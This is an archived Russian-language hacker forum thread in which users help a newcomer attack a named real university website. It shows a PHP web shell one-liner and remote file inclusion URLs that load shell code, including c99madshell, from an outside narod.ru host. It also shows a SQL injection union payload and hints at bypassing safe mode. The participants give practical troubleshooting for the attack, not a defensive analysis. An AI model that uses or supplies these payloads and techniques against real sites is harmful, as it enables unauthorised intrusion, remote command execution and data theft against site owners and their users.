PDA

Просмотр полной версии : PHP & SQL inj


nikoTM
25.09.2007, 17:04
привет всем..люди у мя такая проблема на сайте
http://sicurezza.uniss.it/
есть такое index.php?p= удаленный инклудинг...но по неизвестным мне причинам он не поддерживает например такое
<pre><? @system($_REQUEST['c']); ?></pre> (который я кинул в txt и впихнул в НАРОД). В результате такая страница http://ихсайт/?p=http://что-то.narod.ru/file.txt?c=ls не катит. Но что самое удивидельное когда file.txt такой <? echo 'a'; ?> ссылка катит..вот не пойму с чего бы? :confused:

а про SQL inj там еще есть такое http://sicurezza.uniss.it/index.php?h=1&cat=-1'A но не смог понята почиму он не принимает сам запрос такой результ
You have an error in your SQL syntax near 'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13/* ORDER BY data DESC ' at line 1

NOmeR1
25.09.2007, 17:39
Мда.
1) Не в том разделе
2) http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls

nikoTM
25.09.2007, 17:53
ыы)
1. "Не в том разделе" ок..сорь)
2. http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls ну понятно ж что так
http://sicurezza.uniss.it/index.php?p=http://axhack.narod.ru/1.txt?c=ls ))

NOmeR1
25.09.2007, 18:29
http://sicurezza.uniss.it/index.php?p=http://dermoshell.narod.ru/c99madshell.php
Safe-mode: ON (secure)
Может поэтому?

Ponchik
25.09.2007, 18:32
не
<pre><? @system($_REQUEST['c']); ?></pre>
а
<pre><? @system(stripslashes($_REQUEST['c'])); ?></pre>
Должно работать... :D
=========
ИМХО не в этом там проблема :rolleyes: но попытка не пытка :)

NOmeR1
25.09.2007, 18:55
не
<pre><? @system($_REQUEST['c']); ?></pre>
а
<pre><? @system(stripslashes($_REQUEST['c'])); ?></pre>
Должно работать... :D
=========
ИМХО не в этом там проблема :rolleyes: но попытка не пытка :)
При вкл. сейф моде ничего не будет работать. ;)

nikoTM
25.09.2007, 19:06
понятно огромное спс

Termin@L
25.09.2007, 19:09
При включенном чейф моде юзай мозг)))
Ну или security lab на крайняк, методов обхода туча)

NeMiNeM
25.09.2007, 19:26
Перемещено.

2Автор, в следующий раз будь внимательнее.

n1†R0x
25.09.2007, 19:51
функция system() почти везде отключается, если админы грамотные.

nikoTM
26.09.2007, 00:18
2NeMiNeM, ок сорь..

2Termin@L, может и туча..но я пока ох какой новичок))